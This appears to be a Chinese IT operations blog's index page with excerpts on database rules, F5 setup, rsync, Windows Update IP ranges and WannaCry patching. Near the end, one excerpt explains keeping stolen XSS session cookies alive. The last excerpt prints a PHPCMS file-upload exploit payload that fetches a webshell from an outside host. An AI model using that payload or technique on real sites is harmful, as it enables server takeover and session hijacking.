密码保护:数据库操作规范 – 数据库操作

密码保护:数据库操作规范 – 数据库操作
1,执行sql文件之前必须review一下,防止出现非法的sql。 2,无论是在公司还是在家,执行sql必须放在screen里或者nohup执行,防止网络突然中断。 3,白天能够提前处理的jira,跟项目组沟通提前执行以提高晚上工作效率。 4,正常发布日外的sql执行,必须走紧急发布。 5,对于敏感数据导出的请求需要总裁办审批。 6,搭建主从时不允许只同步指定的库。 7,登录线上服务器必须...

密码保护:数据库操作规范 – 数据库规范化

密码保护:数据库操作规范 – 数据库规范化
数据库安装规范 数据库版本安装mysql-5.6.23 percona工具集安装最新版本 数据库源码编译,指定base路径、指定data目录、指定字符集utf8 mysql安装单实例默认安装为/opt/xxx/mysql/,data目录为/opt/xxx/mysql/data/有PCIE-SSD盘data路径为/database/mysql/data/ 多实例安装时,路径为/opt/xxx/mysql_330X,data目录为/opt/xxx/mysql_330X/data,PCIE-SSD盘data路径为/databa...

密码保护:流程规范 – 研发高压线

密码保护:流程规范 – 研发高压线
目的 为规范研发人员工作操作,严格执行力,维护良好的线上环境。 内容 1. 禁止一切未经授权的线上数据库、环境的操作行为(包括不限于导数据、批量刷新、修改业务数据等) 任何人员未经授权不得对生产环境进行如停止服务器运行、批量修改、删除线上数据等高危操作 任何人员均不得响应未经授权的刷新、修改数据库、导数据的请求 2. 禁止在非授权时间擅自发布 非授权时间擅自...

密码保护:网络 – 知识库 – 日常操作管理

密码保护:网络 – 知识库  – 日常操作管理
1.F5地址管理: 流程为:创建VLAN-关联物理接口-配置IP地址(物理地址和浮动地址) 根据需求(每条专线、内网接口)创建VLAN:Network-VLANs,同时关联到物理接口上,“untag=access”,“tag=trunk”; 配置IP地址:Network-Self IPs,为每一个VLAN配置IP地址,对于两台F5组成的HA组来说,每个VLAN需要两个物理IP(每台F5一个)和一个浮动IP,实际对外访问时使用浮动IP。注意F5...

密码保护:日常规范 – 设备上下架规范

密码保护:日常规范 – 设备上下架规范
机房设备上架标准流程 V0.1   2016年5月 一、目标 为规范机房设备上架流程、设备摆放、设备管理以及保障日程运维、紧急情况处理等工作,特制订本流程。 二、涉及对象 涉及设备:所有需要进入机房并且安装的设备,也包括需要跨机柜迁移的设备。 涉及人员:设备管理员、网络管理员、机房设施管理员、财产管理员(设备管理员包括:系统管理员、网络管理员、安全设备管理员等人...

Windows 2008中配置Rsync同步Linux文件

Windows 2008中配置Rsync同步Linux文件
因为需要对某些源代码检查的需要,这里需要把Linux服务器中的源码同步到本地,因为服务器中的设置我并不知道,而运维的人只给了一个linux的 rsyncd.conf配置文件,就让我同步,无奈自己的服务器是windows的。 研究了好一会。 最终实现的命令是: rsync -avz root@10.10.94.38::xxxxxx /cygdrive/d/wenjianjia/   --port=28950 # 端口 -vzrtopg --progress # 显示同步过...

windows update 更新IP地址集合(windows 更新IP段 合集 收集)

windows update 更新IP地址集合(windows 更新IP段 合集 收集)
因为某些情况下,公司需要禁用这些IP段,晚上花了近4个小时通过各种方法找到了下面的这些数据,虽然不敢说全,但是尽力了。真真的,你看看这篇文字发布的时间也许你就懂了。当然,如果我会反编译windows程序也许会更轻松。好了,不说废话了,直接给出IP地址。 ------------------------------------------------------------------ 65.55.50.189 65.55.50.158 65.55.50.157 ...

MS17-010防范方法 最新勒索病毒(Wannacry蠕虫)防范方法 (445端口关闭方法)

MS17-010防范方法 最新勒索病毒(Wannacry蠕虫)防范方法 (445端口关闭方法)
其实关闭这个端口,关闭那个端口的很费劲,而且有的时候还关闭不了,最重要的是你瞎设置万一出错了呢??? 说来说去何必那么费劲!?!?直接打补丁不就完事了么。   WIN7   32(x86)位操作系统补丁地址: http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu  ...

xss平台持久cookie说明 keepsession说明

xss平台持久cookie说明 keepsession说明
keepsession功能说明 首先简单说明一下【XSS利用之延长Session生命周期】,说白了就是携带你X到的cookie访问对应的URL地址,一般情况下,如果你X到了对方的cookie,时间长不访问(默认21分钟)后,这个cookie就会失效,你就无法使用这个cookie。那么只要你携带着这个X到的cookie,几分钟访问一次,几分钟访问一次,这样cookie就不会失效(当然,如果程序做了特殊验证,那么就没...

PHPCMS最新版任意文件上传漏洞 及 修复方法

PHPCMS最新版任意文件上传漏洞 及 修复方法
注意这个漏洞不知道是哪位朋友爆出来的,找不到来路。。我只是给了修复建议。 首先打开注册页面,然后向注册页面POST如下payload: siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol= 然后就会报错并返回shell地址...